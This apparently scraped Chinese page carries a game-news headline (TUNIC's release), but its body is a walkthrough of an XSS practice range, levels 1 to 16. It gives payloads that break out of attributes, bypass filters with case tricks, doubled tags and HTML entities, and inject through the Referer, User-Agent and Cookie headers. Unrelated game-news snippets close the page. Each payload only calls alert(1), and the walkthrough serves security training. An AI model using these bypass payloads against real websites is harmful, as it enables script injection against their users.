小狐狸大冒險獨立遊戲《TUNIC》今日正式發售登陸XGP

阿新 • • 發佈：2022-03-17

靶場地址

https://xssaq.com/yx/index.php

level1

在name裡產生互動，直接進行XSS就行

name=<script>alert(1)</script>

level2

資料傳入value中，構造value的雙引號閉合

<input name=keyword  value="1111">
"><script>alert(1)</script>

level3

構造單引號value閉合，發現過濾<>

<input name=keyword  value='11111'>
'><script>alert(1)</script>

通過onclick進行過濾

' onclick='alert(1)

level4

過濾<>，構造雙引號閉合，通過onclick過濾

<input name=keyword  value="11111">
" onclick="alert(1)

level5

對script標籤進行破壞，通過href的javascript協議進行繞過

<input name=keyword  value="1111">
"><a href=javascript:alert(1)>

level6

通過level5方法進行繞過，只是破壞href，進行大小寫繞過

"><a hREf=javascript:alert(1)>

level7

對script進行一次過濾，雙寫繞過

"><scscriptript>alert(1)</scriscriptpt>

level8

對標籤進行破壞，替換”等敏感字元，看到href，嘗試javascript::繞過

</center><center><BR><a href="11111">
javascript:alert(1)
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;   //Unicode編碼

href=””這裡面的任意字串，都會被當作協議執行，所以Unicode編碼在前端會被解析成正常的字串

level9

和level8一樣，只是要在結尾加上http://

<input name=keyword  value="1111">
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://

level10

三個隱藏變數，都試一遍，發現只有t_sort可以

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">

傳入引數，改type為text可見

t_sort=" type="text" onmouseover="alert(1)

level11

四個引數都不行，t_ref是Referer引數的值

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_ref"  value="" type="hidden">

抓包後在Referer新增XSS

Referer:" type="text" onmouseover="alert(1)

level12

在User-Agent裡面修改資料

<input name="t_ua"  value="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0" type="hidden">
User-Agent:" type="text" onmouseover="alert(1)

level13

在Cookie裡面修改資料

Cookie:user=" type="text" onmouseover="alert(1)

level14

iframe呼叫的檔案來實現xss注入，靶場環境不允許

level15

1、ng-include 指令用於包含外部的 HTML檔案。

2、包含的內容將作為指定元素的子節點。

3、ng-include 屬性的值可以是一個表示式，返回一個檔名。

4、預設情況下，包含的檔案需要包含在同一個域名下。

1.ng-include,如果單純指定地址，必須要加引號

2.ng-include,載入外部html，script標籤中的內容不執行

3.ng-include,載入外部html中含有style標籤樣式可以識別

<body><span class="ng-include:111"></span></body>
?src='level1.php?name=<img src=1 onerror=alert(1)>'

level16

將script換成&nbsp，也就是空格，通過%0a配合onload繞過

<svg%0aonload=alert(1)>

小狐狸大冒險獨立遊戲《TUNIC》今日正式發售登陸XGP

於 2017 年 E3 上正式公佈，模仿經典《塞爾達傳說》遊戲，由 Andrew Shouldice 一個人獨立製作的小狐狸動作冒險遊戲《TUNIC》終於在今天（3 月 17 日）正式發售了。許多粉絲（包括小編）對這款遊戲都期待已久。今天它

冒險探索遊戲《迷宮大偵探》PC版本今日正式發售 Switch版本將於7月15日上線

由法國工作室Darjeeling製作、發行商Pixmain發行的冒險探索遊戲《迷宮大偵探》今日(6月22日)晚上六點正式上架Steam商店(Steam： https://store.steampowered.com/app/1421790/Labyrinth_City_Pierre_the_Maze_Detect